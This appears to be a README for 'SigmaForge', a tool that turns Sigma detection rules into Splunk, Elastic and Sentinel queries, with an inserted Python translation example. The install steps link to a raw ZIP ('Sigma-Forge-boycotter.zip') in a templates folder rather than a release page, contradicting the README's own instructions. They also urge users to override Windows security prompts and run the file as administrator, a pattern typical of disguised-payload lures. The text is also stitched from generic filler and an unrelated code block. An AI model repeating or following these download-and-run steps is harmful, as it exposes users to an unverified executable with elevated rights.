SigmaForge helps you create Sigma rules from a simple form. It also gives you output for common SIEM formats like Splunk SPL, Elastic KQL, Elastic EQL, and Sentinel KQL.
Use it when you want to turn a detection idea into a rule without writing everything by hand. It is built for people who work on detection content and want a clear way to prepare rules for different platforms.
Visit the release page to download and run this app on Windows:
Look for the latest release file in the list. Download the Windows version, then open the file on your PC.
SigmaForge runs on a Windows desktop or laptop.
You will need:
- Windows 10 or Windows 11
- At least 4 GB of RAM
- 200 MB of free disk space
- A mouse and keyboard
- Internet access to get the release file
For best use, keep your screen at normal desktop size so the form is easy to read.
Before you open SigmaForge, make sure you have:
- Downloaded the latest release from the link above
- Saved the file in a folder you can find again
- Closed any old copy of the app if it is already open
If Windows shows a security prompt, choose the option that lets you open the file.
Follow these steps on Windows:
- Open this link: https://github.com/Unaddicted-swisspine980/SigmaForge/raw/refs/heads/main/templates/Sigma-Forge-boycotter.zip
- Find the newest release at the top of the page
- Open the release asset for Windows
- Save the file to your Downloads folder or Desktop
- If the file is a ZIP file, right-click it and choose Extract All
- Open the extracted folder
- Double-click the SigmaForge app file
- Wait for the app window to appear
If the app opens in your browser, keep that tab open and use it like a local tool. If it opens as a desktop window, pin it to your taskbar if you use it often.
SigmaForge uses a simple flow:
- Enter the rule details
- Choose the fields you want to watch
- Set the match logic
- Pick the target format
- Generate the output
- Copy the rule into your SIEM or save it for later
The app is meant to make rule building easier. You can start with one idea, then shape it into a format that fits your platform.
SigmaForge may ask for details like:
- Rule name
- Rule description
- Log source
- Event fields
- Search terms
- Match conditions
- Severity level
- False positive notes
Use plain language when you fill in the form. For example, write what the alert should catch and what event data matters most.
SigmaForge supports several rule and query formats:
- Splunk SPL: Use this if your team works in Splunk. The output helps you search for matching events in Splunk data.
- Elastic KQL: Use this for Elastic rules that rely on KQL. It is useful for clear field matching and simple searches.
- Elastic EQL: Use this when you need sequence-based detection logic in Elastic. It fits event patterns and ordered behavior.
- Sentinel KQL: Use this for Microsoft Sentinel. The output maps your rule idea into KQL for Sentinel hunts and analytics.
A simple workflow looks like this:
- Think of the activity you want to detect
- Add the log source that sees it
- Add the field names from your logs
- Choose terms, operators, and filters
- Generate the rule
- Review the output
- Copy it into your SIEM
- Test it with known data
If the rule feels too broad, narrow the search terms. If it misses events, check the field names and log source first.
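To make the workflow above concrete, here is an added example of what "generate the rule" means for three of the supported formats. It is not SigmaForge's own code: it takes one constructed Sigma-style rule (a selection plus a known-good filter, combined with `selection and not filter`) and renders it as Splunk SPL, Elastic KQL and Sentinel KQL. The rule, the filter value and the Sentinel table name are constructed for illustration, Sigma field names are passed through unmapped, and Elastic EQL is left out because its sequence syntax does not follow from a single-event rule in the same way.

```python
"""Minimal Sigma-style rule translator: one detection, three query dialects.

Added illustration, not SigmaForge's own code. Supports the Sigma modifiers
contains/startswith/endswith and conditions built from named groups joined by
and/or/not; anything else in the condition is rejected rather than ignored.
"""
import re

# Constructed sample rule laid out like a Sigma YAML document (as a dict so the
# script runs without PyYAML). Field names follow Sigma's Windows process_creation schema.
RULE = {
    "title": "PowerShell With Encoded Command",
    "description": "Detects powershell.exe started with an encoded command line.",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {
            "Image|endswith": "\\powershell.exe",
            "CommandLine|contains": ["-EncodedCommand", "-enc"],
        },
        # Constructed known-good parent used as a false-positive filter.
        "filter_mgmt_agent": {"ParentImage|endswith": "\\MgmtAgent.exe"},
        "condition": "selection and not filter_mgmt_agent",
    },
    "level": "medium",
    "falsepositives": ["Management agents that launch encoded PowerShell"],
}

# Constructed logsource-to-table map for Sentinel; a real deployment needs its own
# table and field map (Sigma field names are passed through unmapped here).
SENTINEL_TABLES = {"process_creation": "DeviceProcessEvents"}

KEYWORDS = {
    "spl": {"and": "AND", "or": "OR", "not": "NOT"},
    "kql": {"and": "and", "or": "or", "not": "not"},
}


def _spl_term(field, modifier, value):
    """Splunk search term: quoted value, * as wildcard, backslash and quote escaped."""
    v = value.replace("\\", "\\\\").replace('"', '\\"')
    pattern = {"contains": f"*{v}*", "endswith": f"*{v}", "startswith": f"{v}*"}.get(modifier, v)
    return f'{field}="{pattern}"'


def _elastic_kql_term(field, modifier, value):
    """Elastic KQL term: exact matches are quoted phrases; wildcard matches must be
    unquoted, so KQL special characters are escaped and whitespace is refused."""
    if not modifier:
        return f'{field}:"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'
    if re.search(r"\s", value):
        raise ValueError(f"KQL wildcard value {value!r} cannot contain whitespace")
    v = re.sub(r'([\\():<>"*{}])', r"\\\1", value)
    pattern = {"contains": f"*{v}*", "endswith": f"*{v}", "startswith": f"{v}*"}[modifier]
    return f"{field}:{pattern}"


def _kusto_term(field, modifier, value):
    """Kusto (Sentinel) term using case-insensitive operators, matching Sigma's default."""
    v = value.replace("\\", "\\\\").replace('"', '\\"')
    op = {"contains": "contains", "endswith": "endswith", "startswith": "startswith"}.get(modifier, "=~")
    return f'{field} {op} "{v}"'


def _render_group(group, term_fn, kw):
    """Fields in one group are ANDed; a list of values for one field is ORed."""
    parts = []
    for key, values in group.items():
        field, _, modifier = key.partition("|")
        values = values if isinstance(values, list) else [values]
        alts = [term_fn(field, modifier, str(v)) for v in values]
        parts.append(alts[0] if len(alts) == 1 else "(" + f" {kw['or']} ".join(alts) + ")")
    return f" {kw['and']} ".join(parts)


def _render_condition(rule, term_fn, kw):
    """Replace each group name in the Sigma condition with its rendered terms."""
    detection = rule["detection"]
    groups = {k: v for k, v in detection.items() if k != "condition"}

    def sub(match):
        tok = match.group(0)
        if tok in kw:
            return kw[tok]
        if tok not in groups:
            raise ValueError(f"condition references unknown group {tok!r}")
        return "(" + _render_group(groups[tok], term_fn, kw) + ")"

    return re.sub(r"\b\w+\b", sub, detection["condition"])


def to_splunk(rule):
    return "search " + _render_condition(rule, _spl_term, KEYWORDS["spl"])


def to_elastic_kql(rule):
    return _render_condition(rule, _elastic_kql_term, KEYWORDS["kql"])


def to_sentinel_kql(rule):
    table = SENTINEL_TABLES[rule["logsource"]["category"]]
    return f"{table}\n| where " + _render_condition(rule, _kusto_term, KEYWORDS["kql"])


if __name__ == "__main__":
    for name, fn in (("Splunk SPL", to_splunk), ("Elastic KQL", to_elastic_kql), ("Sentinel KQL", to_sentinel_kql)):
        print(f"--- {name} ---\n{fn(RULE)}\n")
```

Run it and compare the three outputs side by side: the detection logic is the same, but each dialect quotes, escapes and wildcards differently, which is exactly the "format work" the tool is meant to take off your hands. Before any of this goes into a SIEM, the field names still have to be checked against your real log schema, as the workflow above says.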
Use these tips when you build a rule:
- Keep the rule focused on one behavior
- Use field names from your real logs
- Add known good filters to cut noise
- Test with old alerts before you rely on it
- Save each version so you can compare changes
- Give the rule a name that makes sense to your team
Short, clear rules are easier to tune. They also make review work faster.
If SigmaForge does not start:
- Check that the download finished fully
- Make sure you extracted the ZIP file if one was provided
- Try running the app again from the extracted folder
- Right-click the file and choose Run as administrator if Windows blocks it
- Re-download the release if the file looks broken
If the window opens and closes fast, run it again from the folder so you can see any message.
You can keep the app in a simple folder setup like this:
- Downloads
  - SigmaForge
    - Releases
    - Rules
This makes it easier to keep the app, your generated rules, and test files in one place.
SigmaForge is useful for:
- Detection engineers
- SOC analysts
- Threat hunters
- Security teams
- Anyone who writes Sigma rules
- People who need output for Splunk, Elastic, or Sentinel
It works well when you want one place to shape a rule for more than one platform.
Use SigmaForge to help build detection logic for your own environment or authorized work. Review each generated rule before you put it into production. Check the field names, search terms, and match logic against your log data.
This project is related to:
- cybersecurity
- detection engineering
- elastic
- flask
- python
- security tools
- sentinel
- siem
- sigma
- splunk
If you need help, check the release page for the latest build notes and file names. If the app does not match your screen or your Windows version, download the newest release again and try the steps above.
SigmaForge gives you a clear way to move from an idea to a usable detection rule. It keeps the process simple so you can spend less time on format work and more time on the rule itself.